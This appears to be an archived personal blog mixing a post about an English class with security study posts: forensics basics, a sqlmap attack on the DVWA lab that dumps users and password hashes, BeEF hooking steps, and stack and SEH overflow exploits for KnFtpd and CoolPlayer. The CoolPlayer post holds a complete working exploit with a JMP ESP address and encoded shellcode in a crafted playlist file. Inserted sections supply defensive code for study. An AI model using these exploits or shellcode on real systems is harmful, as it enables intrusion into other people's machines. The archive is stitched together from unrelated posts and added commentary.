Tuesday, 08 April 2014

First Time Class In LIA

     Yup, on Saturday I followed a course at LIA. I participated in the Conversation class at level 1. My course is every Saturday at LIA Bintaro, 8-12 AM, and 5 April 2014 was the first class of the course. I learned in classroom number 202, and it was followed by only 2 students. Yes, just two students.
     In class, just me and my new friend, Dita. He is from Ciledug, ohhhh, it's so far from the course place. My teacher is Miss Saraswati, someone cool, friendly and funny. Because only 2 students study in the course, the learning process only goes until 11:30 AM.
     

Sunday, 28 October 2012

Introduction to Forensic Basics

Computer Forensic 

Computer forensics (sometimes known as computer forensic science) is a branch of digital forensic science pertaining to legal evidence found in computers and digital storage media. The goal of computer forensics is to examine digital media in a forensically sound manner with the aim of identifying, preserving, recovering, analyzing and presenting facts and opinions about the information.

Unallocated space

Unallocated space, sometimes called "free space", is logical space on a hard drive that the operating system, e.g. Windows, can write to. To put it another way, it is the opposite of "allocated" space, which is where the operating system has already written files.
Unallocated file space and file slack are both important sources of leads for the computer forensics investigator. The data storage area in a factory fresh hard disk drive typically contains patterns of sectors which are filled with patterns of format characters. In DOS and Windows-based computer systems, the format pattern for a floppy diskette usually consists of binary data in the form of hex F6s. The same format pattern is sometimes used in the format of hard disk drives but the format patterns can consist of essentially any repeat character as determined by the factory test machine that made the last writes to the hard disk drive. The format pattern is overwritten as files and subdirectories are written in the data area.

Slack Space
Slack space refers to portions of a hard drive that are not fully used by the current allocated file and which may contain data from a previously deleted file.
Illustration of slack space on a hard drive
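To make the two definitions above concrete, here is an added example (not part of the original post) that models a tiny cluster-based disk in Python. It computes how much slack a file leaves in its last cluster, then writes a file, deletes it, and writes a shorter file over its start, so you can see the deleted data still sitting in the new file's slack and in the unallocated clusters, next to clusters that still carry the factory 0xF6 fill. The 512-byte cluster size, the fill byte, the file names and their contents are constructed assumptions for the demonstration.

```python
"""Slack space and unallocated space on a constructed toy disk.

Added example, not from the original post. The 512-byte cluster size, the
0xF6 factory fill and the file contents are constructed assumptions.
"""

CLUSTER_SIZE = 512      # assumption: 512-byte clusters (NTFS/FAT commonly use 4096)
FORMAT_FILL = b"\xf6"   # the hex F6 format pattern described in the post


def slack_bytes(file_size, cluster_size=CLUSTER_SIZE):
    """Bytes between the end of a file's data and the end of its last cluster."""
    if file_size <= 0:
        return 0
    return (-file_size) % cluster_size


def clusters_needed(file_size, cluster_size=CLUSTER_SIZE):
    """Number of whole clusters the allocator hands out for a file."""
    return (file_size + cluster_size - 1) // cluster_size


class ToyDisk:
    """A byte array of clusters plus an allocation table: name -> (first cluster, size)."""

    def __init__(self, n_clusters, cluster_size=CLUSTER_SIZE):
        self.cluster_size = cluster_size
        self.n_clusters = n_clusters
        self.image = bytearray(FORMAT_FILL * (n_clusters * cluster_size))
        self.table = {}

    def write_file(self, name, data, first_cluster):
        """Store the file's bytes contiguously from first_cluster.

        Only the file's own bytes are written; the tail of the last cluster is
        left untouched, which is exactly what produces slack.
        """
        start = first_cluster * self.cluster_size
        self.image[start:start + len(data)] = data
        self.table[name] = (first_cluster, len(data))

    def delete_file(self, name):
        """Deleting drops the table entry; the clusters keep their bytes."""
        del self.table[name]

    def read_cluster(self, index):
        start = index * self.cluster_size
        return bytes(self.image[start:start + self.cluster_size])

    def read_slack(self, name):
        """Bytes after the file's data up to the end of its last cluster."""
        first, size = self.table[name]
        data_end = first * self.cluster_size + size
        cluster_end = (first + clusters_needed(size, self.cluster_size)) * self.cluster_size
        return bytes(self.image[data_end:cluster_end])

    def unallocated_clusters(self):
        """Cluster indexes that no table entry currently claims."""
        used = set()
        for first, size in self.table.values():
            used.update(range(first, first + clusters_needed(size, self.cluster_size)))
        return [i for i in range(self.n_clusters) if i not in used]


def demo():
    """Write a file, delete it, write a shorter one over its start, then look around."""
    disk = ToyDisk(n_clusters=4)
    old = b"SECRET-OLD-DATA " * 40                                  # 640 bytes -> clusters 0 and 1
    disk.write_file("old.txt", old, first_cluster=0)
    disk.delete_file("old.txt")
    disk.write_file("new.txt", b"hello world\n", first_cluster=0)  # 12 bytes in cluster 0
    slack = disk.read_slack("new.txt")
    return {
        "slack_len": len(slack),                                   # 500 bytes of slack
        "old_data_in_slack": b"SECRET-OLD-DATA" in slack,          # deleted data survives there
        "unallocated": disk.unallocated_clusters(),                 # [1, 2, 3]
        "old_data_in_unallocated": b"SECRET-OLD-DATA" in disk.read_cluster(1),
        "cluster_3_still_factory_fill": disk.read_cluster(3) == FORMAT_FILL * CLUSTER_SIZE,
    }


if __name__ == "__main__":
    for key, value in demo().items():
        print(key, value)
```

The point for an examiner is the pair of booleans: nothing in the live file system refers to `old.txt` any more, yet its bytes are recoverable from both the slack of `new.txt` and the unallocated cluster 1, while cluster 3 still shows the never-written factory pattern.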

Tuesday, 23 October 2012

DVWA Exploit (Medium)

1. open your DVWA and log in
   username  = admin
   password  = password

2. set the DVWA security level to Medium

3. choose SQL Injection and then click Submit

   check the cookie in Burp Suite

4. open a terminal and change directory to "sqlmap"

5. run sqlmap with the cookie and the result of the last submit

 ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; PHPSESSID=rgqbqifchg5sdoaadnahfdotg5"

and this is the result

6. search for the passwords

 ./sqlmap.py -u "http://localhost/dvwa/vulnerabilities/sqli/?id=%27&Submit=Submit#" --cookie "security=medium; PHPSESSID=rgqbqifchg5sdoaadnahfdotg5" --users --passwords

and this is the result
sorry, not root yet; I am still trying to get root
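What sqlmap is probing above is a query that pastes the `id` value straight into SQL text. The following is an added example, not DVWA's own code and not part of the original post: a Python/sqlite3 stand-in for DVWA's users table with the vulnerable lookup next to its parameterised fix, plus a helper that shows why the lone `%27` single quote in the URL above is informative (it makes the vulnerable query fail with a database error, and does nothing to the fixed one). The table, the rows and the function names are constructed assumptions.

```python
"""String-built SQL beside its parameterised fix (sqlite3 stand-in for DVWA's MySQL).

Added example, not DVWA's code and not from the original post. The table and
rows are constructed to resemble DVWA's users table.
"""
import sqlite3


def make_db():
    """In-memory table with a few constructed rows."""
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (user_id INTEGER, first_name TEXT, last_name TEXT)")
    conn.executemany("INSERT INTO users VALUES (?, ?, ?)",
                     [(1, "admin", "admin"), (2, "Gordon", "Brown"), (3, "Pablo", "Picasso")])
    return conn


def lookup_vulnerable(conn, user_id):
    """Same shape as the vulnerable DVWA page: the id is pasted into the SQL text."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = '%s'" % user_id
    return conn.execute(sql).fetchall()


def lookup_safe(conn, user_id):
    """Parameterised query: the value travels separately and is never parsed as SQL."""
    sql = "SELECT first_name, last_name FROM users WHERE user_id = ?"
    return conn.execute(sql, (user_id,)).fetchall()


def lookup_safe_typed(conn, user_id):
    """Defence in depth: an id is an integer, so refuse anything else before querying."""
    if not isinstance(user_id, int):
        if not (isinstance(user_id, str) and user_id.isdigit()):
            raise ValueError("user_id must be a non-negative integer")
        user_id = int(user_id)
    return lookup_safe(conn, user_id)


def single_quote_probe(conn, lookup):
    """What the id=%27 request in the post does to each lookup.

    Returns the database error class name if the lone quote breaks the SQL
    (the signal error-based testing looks for), or 'no error' if the query
    simply matched nothing.
    """
    try:
        lookup(conn, "'")
        return "no error"
    except sqlite3.Error as exc:
        return type(exc).__name__


if __name__ == "__main__":
    db = make_db()
    print("normal id, vulnerable :", lookup_vulnerable(db, "2"))
    print("normal id, safe       :", lookup_safe(db, "2"))
    print("tautology, vulnerable :", lookup_vulnerable(db, "' OR '1'='1"))   # every row
    print("tautology, safe       :", lookup_safe(db, "' OR '1'='1"))         # no rows
    print("quote probe, vulnerable:", single_quote_probe(db, lookup_vulnerable))
    print("quote probe, safe      :", single_quote_probe(db, lookup_safe))
```

Two things to notice: the fix is not escaping or filtering but keeping data and code separate, and the database error leaking to the client on the vulnerable path is itself a detection opportunity (a spike of SQL syntax errors in the application log is what an automated scan against this page looks like from the server side).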

Friday, 19 October 2012

combination of Windows with a Metasploit exploit and BeEF

1. start "beef"

2. open the URL http://127.0.0.1:3000/ui/panel, and this is the result

3. log in before entering the BeEF home panel, with username and password both "beef"

and this is the result after login

4. make the file "victim.html" as the place for the "beef" hook

5. look at the result: it will display an "alert dialog" according to what was entered in the BeEF home panel.

 execute it from the BeEF panel with an alert dialog

6. open msfconsole

Sunday, 14 October 2012

How to Use POP POP RETN

POP POP RETN is used to bypass the SEH handler in an application. As a regular application is protected by SafeSEH, which serves to protect the SEH handler, we need a module that is not protected by SafeSEH; usually the default modules are not protected by SafeSEH.

Monday, 08 October 2012

KnFtpd 1.0.0 exploit

1. make the fuzzer

#!/usr/bin/python
# Python 2: str is bytes, so the buffer can be sent as-is
import socket
target_address="192.168.56.101"
target_port=21
buffer = "\x41" * 3000   # 3000 bytes of 'A' as the crash trigger
sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

open KnFtpd and OllyDbg, run the fuzzer, and this is the result
after fuzzing, look at EIP and the SEH chain
 this is the result after pressing SHIFT + F9 on the SEH chain

2. create the pattern offset and results
edit the fuzzer file to become
#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
#buffer = "\x41" * 3000
buffer = "Aa0Aa1Aa2Aa3Aa4A........." # the generated pattern, used to find the offset

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

3. search for POP r32, POP r32, RETN, and this is the result

edit your fuzzer file to become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer ="\x41"* 322                    # padding up to the SEH handler, offset found with the pattern
buffer+="\x23\x37\x40\x00"             # address of the POP POP RETN found above (little-endian)
buffer+="\x41"* (3000 - len(buffer))   # fill back up to the original 3000 bytes

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

   and run the fuzzer, this is the result


4. check with DEADBEEF
again edit your fuzzer file to become

#!/usr/bin/python
import socket
target_address="192.168.56.101"
target_port=21
buffer ="\x41"* 322                    # padding up to the SEH handler
#buffer+="\xef\xbe\xad\xde"            # 0xDEADBEEF marker (commented out here; enable it to check the overwrite)
buffer+="\x23\x37\x40\x00"             # address of the POP POP RETN (little-endian)
buffer+="\x41"* (3000 - len(buffer))   # fill back up to 3000 bytes

sock=socket.socket(socket.AF_INET,socket.SOCK_STREAM)
sock.connect((target_address,target_port))
sock.send(buffer)
print("yes")
sock.close()

and this is the result
after that, checking JMP ESP; I used kernel32.dll, check this result


CoolPlayer Exploit (local)

1. make the fuzzer file, as shown below:
myfile="cool.m3u"
myjunk="\x41" * 500        # 500 bytes of 'A' as the crash trigger
file=open(myfile,'w')
file.write(myjunk)
print("Yess..")
file.close()


 and then run CoolPlayer and OllyDbg, load the file "cool.m3u" and it crashes.. look at the instruction pointer (EIP) in OllyDbg, it is overwritten

Check the SEH chain, and this is the result; then press Shift + F9




2. make the pattern offset, and copy the resulting pattern into the fuzzer file
so it becomes:
myfile="cool.m3u"
# 500-byte cyclic pattern (pattern_create output), split across lines for readability
myjunk=("Aa0Aa1Aa2Aa3Aa4Aa5Aa6Aa7Aa8Aa9Ab0Ab1Ab2Ab3Ab4Ab5Ab6Ab7Ab8Ab9"
"Ac0Ac1Ac2Ac3Ac4Ac5Ac6Ac7Ac8Ac9Ad0Ad1Ad2Ad3Ad4Ad5Ad6Ad7Ad8Ad9"
"Ae0Ae1Ae2Ae3Ae4Ae5Ae6Ae7Ae8Ae9Af0Af1Af2Af3Af4Af5Af6Af7Af8Af9"
"Ag0Ag1Ag2Ag3Ag4Ag5Ag6Ag7Ag8Ag9Ah0Ah1Ah2Ah3Ah4Ah5Ah6Ah7Ah8Ah9"
"Ai0Ai1Ai2Ai3Ai4Ai5Ai6Ai7Ai8Ai9Aj0Aj1Aj2Aj3Aj4Aj5Aj6Aj7Aj8Aj9"
"Ak0Ak1Ak2Ak3Ak4Ak5Ak6Ak7Ak8Ak9Al0Al1Al2Al3Al4Al5Al6Al7Al8Al9"
"Am0Am1Am2Am3Am4Am5Am6Am7Am8Am9An0An1An2An3An4An5An6An7An8An9"
"Ao0Ao1Ao2Ao3Ao4Ao5Ao6Ao7Ao8Ao9Ap0Ap1Ap2Ap3Ap4Ap5Ap6Ap7Ap8Ap9"
"Aq0Aq1Aq2Aq3Aq4Aq5Aq")
file=open(myfile,'w')
file.write(myjunk)
print("Yess..")
file.close()


run CoolPlayer and OllyDbg, load the file, and this is the resulting value of EIP

3. check with DEADBEEF; before the DEADBEEF check, work out the offset from the pattern

edit our fuzzer file to become

myfile="cool.m3u"
myjunk="\x90" * 260           # padding up to the overwrite, offset found with the pattern
myjunk+="\xEF\xBE\xAD\xDE"    # 0xDEADBEEF marker: EIP should show DEADBEEF if the offset is right
file=open(myfile,'w')
file.write(myjunk)
print("Yess..")
file.close()

and this is the result
4. Finding JMP ESP
choose Executable Modules; here I use shell32.dll, double click on shell32.dll, then right click, Search for, Command, and type JMP ESP..

and this is the result

and press Shift + F9 to check the stack, and this is the result

5. Edit your fuzzer file to launch the calculator, which proves the offset from the pattern is correct.. open the browser and go to 127.0.0.1:55555, choose payload - windows execute command, as below



#!/usr/bin/python
myfile="cool.m3u"
myjunk="\x90" * 260           # padding up to the overwrite
myjunk+="\xD7\x30\x9D\x7C"    # address of the JMP ESP in shell32.dll (little-endian)
myjunk+="\x90" * 16           # NOP sled before the payload
# payload generated above (windows execute command, calc)
myjunk+=("\xdb\xdc\xb8\x76\x35\x3c\x23\x2b\xc9\xb1\x23\xd9\x74\x24\xf4\x5f"
"\x83\xef\xfc\x31\x47\x13\x03\x31\x26\xde\xd6\x41\xa0\x5a\x19\xb9"
"\x31\xe8\x5c\x85\xba\x92\x5b\x8d\xbd\x85\xef\x22\xa6\xd2\xaf\x9c"
"\xd7\x0f\x06\x57\xe3\x44\x98\x89\x3d\x9b\x02\xf9\xba\xdb\x41\x06"
"\x02\x11\xa4\x09\x46\x4d\x43\x32\x12\xb6\xa8\x31\x7f\x3d\xef\x9d"
"\x7e\xa9\x76\x56\x8c\x66\xfc\x37\x91\x79\xe9\x4c\xb5\xf2\xec\xb9"
"\x4f\x58\xcb\x39\x93\x50\xd3\x25\x98\xd3\xe3\x20\x5e\xab\x0f\xa1"
"\x1f\x40\x9b\xc5\x83\xf5\x10\x4d\xb4\xee\x2e\x06\x44\x40\x30\x18"
"\x45\x2a\x59\x24\x1a\x1d\x6c\x34\xf2\xd4\x68\x37\x3a\x9d\xd8\x5f"
"\x4b\xe8\xdd\xc0\xc3\x75\x23\x74\x1d\xd1\x23\x6f\x41\xbc\xb7\x0c"
"\x86")
file=open(myfile,'w')
file.write(myjunk)
print("Yess..")
file.close()

 

running coolplayer and the load file fuzzer before his, and then this result
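Both the KnFtpd crash and the CoolPlayer crash above have the same root cause: a line from an untrusted source (an FTP control command, an entry in a .m3u playlist) is copied into a fixed-size buffer with no length check, so 3000 or 500 bytes of input land on top of the SEH record or the saved return address. The following is an added example, not KnFtpd's or CoolPlayer's code and not part of the original post: the bound a server or parser should enforce before the data reaches any fixed buffer, applied to a constructed FTP control stream and a constructed playlist, plus a small scanner that flags the oversized inputs the fuzzers in these posts send. The 512-byte command limit, the 260-byte playlist-entry limit (the size of Windows MAX_PATH), the sample stream and the sample playlists are constructed assumptions.

```python
"""Bounding untrusted line length before it reaches a fixed-size buffer.

Added example, not from the original post and not KnFtpd's or CoolPlayer's
code. The limits and all sample inputs are constructed assumptions.
"""

MAX_FTP_LINE = 512     # assumption: generous for real FTP commands, far below the 3000-byte fuzz
MAX_M3U_ENTRY = 260    # assumption: Windows MAX_PATH; below the 500-byte fuzz


class OversizedInput(ValueError):
    """Raised when a line exceeds the bound a fixed buffer could safely hold."""


def parse_ftp_command(raw, limit=MAX_FTP_LINE):
    """Split one control-connection line (bytes) into (VERB, argument).

    The length check comes first, before any decoding or copying, which is the
    check the vulnerable server is missing.
    """
    if len(raw) > limit:
        raise OversizedInput("ftp line is %d bytes, limit %d" % (len(raw), limit))
    line = raw.rstrip(b"\r\n")
    if not line:
        raise ValueError("empty command")
    verb, _, arg = line.partition(b" ")
    if not verb.isalpha():
        raise ValueError("verb must be alphabetic")
    return verb.decode("ascii").upper(), arg.decode("latin-1")


def parse_m3u(text, limit=MAX_M3U_ENTRY):
    """Return the playlist entries, refusing any entry longer than limit."""
    entries = []
    for number, line in enumerate(text.splitlines(), 1):
        if not line or line.startswith("#"):   # blank lines and #EXTM3U/#EXTINF directives
            continue
        if len(line) > limit:
            raise OversizedInput("m3u line %d is %d bytes, limit %d" % (number, len(line), limit))
        entries.append(line)
    return entries


def m3u_is_safe(text, limit=MAX_M3U_ENTRY):
    """True if every entry is within the bound, False if the parser would refuse it."""
    try:
        parse_m3u(text, limit)
        return True
    except OversizedInput:
        return False


def scan_control_stream(raw_lines, limit=MAX_FTP_LINE):
    """Run captured control-channel lines through the parser and collect alerts.

    Returns (index, category, detail) for every line a hardened server would
    refuse; a 3000-byte 'command' stands out immediately.
    """
    alerts = []
    for index, raw in enumerate(raw_lines):
        try:
            parse_ftp_command(raw, limit)
        except OversizedInput as exc:
            alerts.append((index, "oversized", str(exc)))
        except ValueError as exc:
            alerts.append((index, "malformed", str(exc)))
    return alerts


# Constructed samples: a normal login exchange followed by the 3000-byte fuzz from the post,
# and a normal playlist beside the 500-byte fuzz file.
SAMPLE_STREAM = [
    b"USER anonymous\r\n",
    b"PASS guest@example.com\r\n",
    b"PWD\r\n",
    b"\x41" * 3000,
]
SAMPLE_M3U = "#EXTM3U\n#EXTINF:123,Song\nC:\\Music\\song.mp3\n"
SAMPLE_FUZZ_M3U = "\x41" * 500


if __name__ == "__main__":
    for alert in scan_control_stream(SAMPLE_STREAM):
        print("ALERT line %d (%s): %s" % alert)
    print("playlist ok:", m3u_is_safe(SAMPLE_M3U), "fuzz ok:", m3u_is_safe(SAMPLE_FUZZ_M3U))
```

The same bound serves two purposes: in the server or player it stops the copy before the buffer overflows, and in a log or capture scanner it is a cheap, low-false-positive signal that someone is fuzzing the service with exactly the kind of input shown in these posts.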